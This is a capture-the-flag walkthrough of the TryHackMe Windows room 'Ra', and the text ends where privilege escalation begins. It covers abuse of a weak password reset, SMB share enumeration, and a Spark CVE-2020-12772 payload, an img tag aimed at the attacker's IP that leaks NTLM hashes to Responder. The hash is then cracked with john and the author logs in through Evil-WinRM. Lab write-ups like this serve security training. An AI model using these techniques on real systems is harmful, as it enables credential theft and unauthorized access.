Overview
This windows box involved a lot of enumeration. It starts with us resetting an account via the poorly implemented reset password functionality on the web server.Then we are able to enumerate smb. We find installation files for spark 2.8.3 which is vulnerable CVE-2020-12772. We get the NTLM hash for a user on the box. The user is a part of the Account Operators group and we find a powershell script that is being run automatically, we change the password of the user who owns the script that is scheduled to run automatically every few minutes. We modify and add another user to the domain and add the newly created user in the administrators group. Now we can use psexec or Evil-WinRM to login as the user we created who is part of the administrators group.
| Machine Link | https://tryhackme.com/room/ra |
| Operating System | Windows |
| Difficulty | Hard |
| Machine Created by | 4ndr34zz |
Enumeration
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
Nmap 7.80 scan initiated Sat Nov 14 20:13:25 2020 as: nmap -p- --min-rate 10000 -T4 -sC -sV -v -Pn -oN nmap-scan 10.10.226.131
Nmap scan report for 10.10.226.131
Host is up (0.16s latency).
Not shown: 65500 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Windcorp.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-11-14 14:44:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
| http-methods:
|_ Supported Methods: OPTIONS
| http-ntlm-info:
| Target_Name: WINDCORP
| NetBIOS_Domain_Name: WINDCORP
| NetBIOS_Computer_Name: FIRE
| DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
|_ Product_Version: 10.0.17763
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesnt have a title.
| ssl-cert: Subject: commonName=Windows Admin Center
| Subject Alternative Name: DNS:WIN-2FAA40QQ70B
| Issuer: commonName=Windows Admin Center
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha512WithRSAEncryption
| Not valid before: 2020-04-30T14:41:03
| Not valid after: 2020-06-30T14:41:02
| MD5: 31ef ecc2 3c93 81b1 67cf 3015 a99f 1726
|_SHA-1: ef2b ac66 5e99 dae7 1182 73a1 93e8 a0b7 c772 f49c
|_ssl-date: 2020-11-14T14:47:28+00:00; +30s from scanner time.
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WINDCORP
| NetBIOS_Domain_Name: WINDCORP
| NetBIOS_Computer_Name: FIRE
| DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
| Product_Version: 10.0.17763
|_ System_Time: 2020-11-14T14:46:51+00:00
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Issuer: commonName=Fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-11-13T14:23:32
| Not valid after: 2021-05-15T14:23:32
| MD5: 6807 9b9e 1b7c 5868 04d2 2c76 0cff d0f3
|_SHA-1: 0120 f2b6 78c5 cd14 1f35 edb9 3f5d 853a 9c78 788b
|_ssl-date: 2020-11-14T14:47:29+00:00; +31s from scanner time.
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| features:
|
| errors:
| invalid-namespace
| (timeout)
| compression_methods:
|
| capabilities:
|
| xmpp:
| version: 1.0
| auth_mechanisms:
|
| stream_id: 8m9lbpgdkf
|_ unknown:
5223/tcp open ssl/hpvirtgrp?
5229/tcp open jaxflow?
5262/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| features:
|
| errors:
| invalid-namespace
| (timeout)
| compression_methods:
|
| capabilities:
|
| xmpp:
| version: 1.0
| auth_mechanisms:
|
| stream_id: 1d9uzzborg
|_ unknown:
5263/tcp open ssl/unknown
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| STARTTLS Failed
| info:
| features:
|
| errors:
| (timeout)
| compression_methods:
|
| xmpp:
|
| auth_mechanisms:
|
| capabilities:
|
|_ unknown:
5270/tcp open ssl/xmp?
5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| features:
|
| errors:
| invalid-namespace
| (timeout)
| compression_methods:
|
| capabilities:
|
| xmpp:
| version: 1.0
| auth_mechanisms:
|
| stream_id: 936v5nk59h
|_ unknown:
5276/tcp open ssl/unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp open http Jetty 9.4.18.v20190429
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp open ssl/http Jetty 9.4.18.v20190429
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Issuer: commonName=fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-01T08:39:00
| Not valid after: 2025-04-30T08:39:00
| MD5: b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7
|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae
7777/tcp open socks5 (No authentication; connection failed)
| socks-auth-info:
|_ No authentication
9090/tcp open zeus-admin?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Sat, 14 Nov 2020 14:44:26 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sat, 14 Nov 2020 14:44:34 GMT
| Allow: GET,HEAD,POST,OPTIONS
| JavaRMI, drda, ibm-db2-das, informix:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| SqueezeCenter_CLI:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| WMSRequest:
| HTTP/1.1 400 Illegal character CNTL=0x1
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open ssl/xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Sat, 14 Nov 2020 14:44:47 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sat, 14 Nov 2020 14:44:47 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 400 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Issuer: commonName=fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-01T08:39:00
| Not valid after: 2025-04-30T08:39:00
| MD5: b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7
|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae
9389/tcp open mc-nmf .NET Message Framing
49670/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
49892/tcp open msrpc Microsoft Windows RPC
Host script results:
|_clock-skew: mean: 30s, deviation: 0s, median: 30s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-11-14T14:46:53
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 14 20:23:10 2020 -- 1 IP address (1 host up) scanned in 584.63 seconds
From the nmap scan we find that the DNS_Domain_Name: windcorp.thm and the ssl-cert script is leaking a hostname fire.windcorp.thm. Adding both of these to my /etc/hosts file.
Port 80
We see a Rest Password button, which asks for the username and the answer to any of the 4 security questions:
On the main page we find a list of the staff with their usernames.
Let’s create a username list.
1
2
3
4
5
6
7
8
9
10
11
12
13
organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
brownostrich284
sadswan869
whiteleopard529
happymeercat399
orangegorilla428
There is a section “Employees in Focus” and looking at the picture names revealed Lily Levesque’s pet’s name. Now we can use the reset password functionality to reset her password. So the username is lilyle and pet’s name is Sparky.
Enumerating SMB
Let’s look at the smb shares and the password policy, looking at the password policy is good before doing any bruteforcing because if there is an account lock out policy set then we might end up locking out accounts and that’s not what we want.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u lilyle -p 'ChangeMe#1234' --shares
SMB 10.10.226.131 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.226.131 445 FIRE [+] windcorp.thm\lilyle:ChangeMe#1234
SMB 10.10.226.131 445 FIRE [+] Enumerated shares
SMB 10.10.226.131 445 FIRE Share Permissions Remark
SMB 10.10.226.131 445 FIRE ----- ----------- ------
SMB 10.10.226.131 445 FIRE ADMIN$ Remote Admin
SMB 10.10.226.131 445 FIRE C$ Default share
SMB 10.10.226.131 445 FIRE IPC$ READ Remote IPC
SMB 10.10.226.131 445 FIRE NETLOGON READ Logon server share
SMB 10.10.226.131 445 FIRE Shared READ
SMB 10.10.226.131 445 FIRE SYSVOL READ Logon server share
SMB 10.10.226.131 445 FIRE Users READ
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u lilyle -p 'ChangeMe#1234' --pass-pol
SMB 10.10.226.131 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.226.131 445 FIRE [+] windcorp.thm\lilyle:ChangeMe#1234
SMB 10.10.226.131 445 FIRE [+] Dumping password info for domain: WINDCORP
SMB 10.10.226.131 445 FIRE Minimum password length: 7
SMB 10.10.226.131 445 FIRE Password history length: 24
SMB 10.10.226.131 445 FIRE Maximum password age:
SMB 10.10.226.131 445 FIRE
SMB 10.10.226.131 445 FIRE Password Complexity Flags: 010001
SMB 10.10.226.131 445 FIRE Domain Refuse Password Change: 0
SMB 10.10.226.131 445 FIRE Domain Password Store Cleartext: 1
SMB 10.10.226.131 445 FIRE Domain Password Lockout Admins: 0
SMB 10.10.226.131 445 FIRE Domain Password No Clear Change: 0
SMB 10.10.226.131 445 FIRE Domain Password No Anon Change: 0
SMB 10.10.226.131 445 FIRE Domain Password Complex: 1
SMB 10.10.226.131 445 FIRE
SMB 10.10.226.131 445 FIRE Minimum password age:
SMB 10.10.226.131 445 FIRE Reset Account Lockout Counter: 2 minutes
SMB 10.10.226.131 445 FIRE Locked Account Duration: 2 minutes
SMB 10.10.226.131 445 FIRE Account Lockout Threshold: 5
SMB 10.10.226.131 445 FIRE Forced Log off Time: Not Set
According to the password policy there is a lockout threshold of 5 which means if we provide the wrong passsword 5 times for a user, then we would end up locking out that account for the Locked Account Duration which is 2 minutes in this case. So let’s avoid brute-forcing smb and continue exploring the smb shares accessible by lilyle.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ smbmap -u 'lilyle' -p 'ChangeMe#1234' -H windcorp.thm -r 130 ⨯
[+] IP: windcorp.thm:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 InitShutdown
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 lsass
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 ntsvcs
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 scerpc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-244-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 epmapper
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-2b8-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 LSM_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 eventlog
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-530-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 atsvc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-734-0
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 wkssvc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-340-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-340-1
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 RpcProxy\49674
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 1fa260e57b61ac4e
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 RpcProxy\593
fr--r--r-- 4 Mon Jan 1 05:53:28 1601 srvsvc
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 spoolss
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-964-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 netdfs
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 ROUTER
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 W32TIME_ALT
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-32c-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 PSHost.132498373871065180.4064.DefaultAppDomain.powershell
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-cd0-0
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 TermSrv_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 Ctx_WinStation_API_service
fr--r--r-- 3 Mon Jan 1 05:53:28 1601 SessEnvPublicRpc
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-16fc-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 PSHost.132498373859437939.3600.DefaultAppDomain.sme
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 PSHost.132498374391876309.3004.DefaultAppDomain.powershell
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 Winsock2\CatalogChangeListener-cb0-0
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 iisipmff316478-5d8e-4104-a522-2909c9a54989
fr--r--r-- 1 Mon Jan 1 05:53:28 1601 iislogpipeadb9a285-0017-403b-b5a4-8dbfb24435c9
NETLOGON READ ONLY Logon server share
.\NETLOGON\*
dr--r--r-- 0 Sat May 2 15:32:19 2020 .
dr--r--r-- 0 Sat May 2 15:32:19 2020 ..
Shared READ ONLY
.\Shared\*
dr--r--r-- 0 Sat May 30 06:15:42 2020 .
dr--r--r-- 0 Sat May 30 06:15:42 2020 ..
fr--r--r-- 45 Fri May 1 21:02:36 2020 Flag 1.txt
fr--r--r-- 29526628 Sat May 30 06:15:01 2020 spark_2_8_3.deb
fr--r--r-- 99555201 Sun May 3 16:38:39 2020 spark_2_8_3.dmg
fr--r--r-- 78765568 Sun May 3 16:38:39 2020 spark_2_8_3.exe
fr--r--r-- 123216290 Sun May 3 16:38:39 2020 spark_2_8_3.tar.gz
SYSVOL READ ONLY Logon server share
.\SYSVOL\*
dr--r--r-- 0 Sat May 2 15:32:20 2020 .
dr--r--r-- 0 Sat May 2 15:32:20 2020 ..
dr--r--r-- 0 Sat May 2 15:32:20 2020 NRznLVEcPj
dr--r--r-- 0 Thu Apr 30 20:41:10 2020 windcorp.thm
Users READ ONLY
.\Users\*
dw--w--w-- 0 Sun May 3 03:35:58 2020 .
dw--w--w-- 0 Sun May 3 03:35:58 2020 ..
dr--r--r-- 0 Sun May 10 16:48:11 2020 Administrator
dr--r--r-- 0 Fri May 1 06:03:55 2020 All Users
dr--r--r-- 0 Fri May 1 18:39:44 2020 angrybird
dr--r--r-- 0 Fri May 1 18:39:34 2020 berg
dr--r--r-- 0 Fri May 1 18:39:22 2020 bluefrog579
dr--r--r-- 0 Sun May 3 19:00:02 2020 brittanycr
dr--r--r-- 0 Fri May 1 18:39:08 2020 brownostrich284
dr--r--r-- 0 Sat Nov 14 19:55:12 2020 buse
dw--w--w-- 0 Fri May 1 05:05:11 2020 Default
dr--r--r-- 0 Fri May 1 06:03:55 2020 Default User
fr--r--r-- 174 Fri May 1 06:01:55 2020 desktop.ini
dr--r--r-- 0 Fri May 1 18:38:54 2020 edward
dr--r--r-- 0 Sun May 3 05:00:16 2020 freddy
dr--r--r-- 0 Fri May 1 18:38:28 2020 garys
dr--r--r-- 0 Sat Nov 14 22:21:05 2020 goldencat416
dr--r--r-- 0 Fri May 1 18:38:17 2020 goldenwol
dr--r--r-- 0 Fri May 1 18:38:06 2020 happ
dr--r--r-- 0 Fri May 1 18:37:53 2020 happyme
dr--r--r-- 0 Fri May 1 18:37:42 2020 Luis
dr--r--r-- 0 Fri May 1 18:37:31 2020 orga
dr--r--r-- 0 Fri May 1 18:37:19 2020 organicf
dr--r--r-- 0 Sat Nov 14 22:21:59 2020 organicfish718
dr--r--r-- 0 Fri May 1 18:37:06 2020 pete
dw--w--w-- 0 Thu Apr 30 20:05:47 2020 Public
dr--r--r-- 0 Fri May 1 18:36:54 2020 purplecat
dr--r--r-- 0 Fri May 1 18:36:42 2020 purplepanda
dr--r--r-- 0 Fri May 1 18:36:31 2020 sadswan
dr--r--r-- 0 Sat Nov 14 22:17:23 2020 sadswan869
dr--r--r-- 0 Fri May 1 18:36:20 2020 sheela
dr--r--r-- 0 Fri May 1 18:35:39 2020 silver
dr--r--r-- 0 Fri May 1 18:35:24 2020 smallf
dr--r--r-- 0 Fri May 1 18:35:05 2020 spiff
dr--r--r-- 0 Fri May 1 18:34:49 2020 tinygoos
dr--r--r-- 0 Fri May 1 18:33:57 2020 whiteleopard
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ smbclient -U lilyle //windcorp.thm/Shared 1 ⨯
Enter WORKGROUP\lilyle's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 30 06:15:42 2020
.. D 0 Sat May 30 06:15:42 2020
Flag 1.txt A 45 Fri May 1 21:02:36 2020
spark_2_8_3.deb A 29526628 Sat May 30 06:15:01 2020
spark_2_8_3.dmg A 99555201 Sun May 3 16:36:58 2020
spark_2_8_3.exe A 78765568 Sun May 3 16:35:56 2020
spark_2_8_3.tar.gz A 123216290 Sun May 3 16:37:24 2020
15587583 blocks of size 4096. 10895808 blocks available
smb: \> get "Flag 1.txt"
getting file \Flag 1.txt of size 45 as Flag 1.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ cat 'Flag 1.txt'
THM{466d52dc75******************************}
There are also many installation files for Spark 2.8.3, and based on quick google search we find that Spark 2.8.3 is vulnerable. I will grab the .deb file from the smb share.
On reading about the CVE-2020-12772, I found this github repository which was actually created by the makers of this machine. According to this, We can send a message with an img tag to another user using spark and each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!
As explained in the github repo, we will use responder and send a message with an img tag and we should recieve the NTLM hash of the user who visits the link.
We have a usernames list we can send our payload “<img src=http://yourtun0IP/a.png>” to different users and check in responder if we get the NTLM hash for any of them.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ sudo responder -I tun0
[sudo] password for sid:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.2.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.8.82.29]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.226.131
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:010100000000
00003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C
004B00490054000400120073006D0062002E006C006F00630061006C0003002800730065007200760065007200320030003000
33002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000
00000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A0010000000
0000000000000000000000000000090000000000000000000000
[*] Skipping previously captured hash for WINDCORP\buse
Let’s crack this hash with help of john the ripper.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ echo "buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD00000000020006005300
4D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C00030028007300650072007600650072003200300
0300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE
5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000" > hash
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
uzunLM+3131 (buse)
1g 0:00:00:02 DONE (2020-11-14 23:27) 0.3355g/s 993073p/s 993073c/s 993073C/s v0yage..uya051
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
We successfully cracked buse’s password let’s check in crackmapexec if we can psexec or winrm into the box.
1
2
3
4
5
6
7
8
9
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u buse -p 'uzunLM+3131'
SMB 10.10.226.131 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.226.131 445 FIRE [+] windcorp.thm\buse:uzunLM+3131
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec winrm windcorp.thm -u buse -p 'uzunLM+3131'
WINRM 10.10.226.131 5985 FIRE [*] http://10.10.226.131:5985/wsman
WINRM 10.10.226.131 5985 FIRE [+] WINDCORP\buse:uzunLM+3131 (Pwn3d!)
crackmapexec says Pwn3d! for winrm that means we can use Evil-WinRM to get on the box.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ evil-winrm -i windcorp.thm -u buse -p 'uzunLM+3131'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\buse\Documents> whoami
windcorp\buse
*Evil-WinRM* PS C:\Users\buse\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\buse\Desktop> dir
Directory: C:\Users\buse\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/7/2020 3:00 AM Also stuff
d----- 5/7/2020 2:58 AM Stuff
-a---- 5/2/2020 11:53 AM 45 Flag 2.txt
-a---- 5/1/2020 8:33 AM 37 Notes.txt
*Evil-WinRM* PS C:\Users\buse\Desktop> type "Flag 2.txt"
THM{6f690fc72b******************************}
Privilege Escalation
First we check what all groups the user buse is part of and if there is any special privilege we have.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
